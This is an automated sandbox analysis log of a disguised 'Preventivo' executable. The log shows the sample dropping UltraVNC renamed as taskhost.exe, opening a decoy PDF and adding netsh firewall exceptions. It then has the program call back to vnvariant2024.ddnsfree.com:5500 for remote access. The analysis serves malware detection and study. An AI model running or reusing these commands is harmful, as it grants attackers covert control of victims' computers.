Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Preventivo24.01.11.exe

Virustotal: Detection: 17%

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File read: C:\Users\user\Desktop\Preventivo24.01.11.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="
Source: unknown	Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="	Jump to behavior
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini

Jump to behavior

Source: C:\Games\taskhost.exe

File opened: C:\Windows\SysWOW64\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Preventivo24.01.11.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Preventivo24.01.11.exe

Static file information: File size 5955744 > 1048576

Source: Preventivo24.01.11.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00

Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Preventivo24.01.11.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Preventivo24.01.11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI54C4.tmp.0.dr, MSI5406.tmp.0.dr, MSI54A3.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr

Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: shi5398.tmp.0.dr

Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B20CA0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00B20CA0

Source: Preventivo24.01.11.exe	Static PE information: section name: .didat
Source: ddengine.dll.0.dr	Static PE information: section name: .SharedD
Source: shi5398.tmp.0.dr	Static PE information: section name: .wpp_sf
Source: shi5398.tmp.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_05508A79 push es; ret	0_3_05508E9A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_05510604 push es; retf	0_3_055106EE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_05519828 pushad ; retf	0_3_05519829
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_05510893 push es; ret	0_3_05510896
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_3_05508EAD push es; retf	0_3_05508EAE
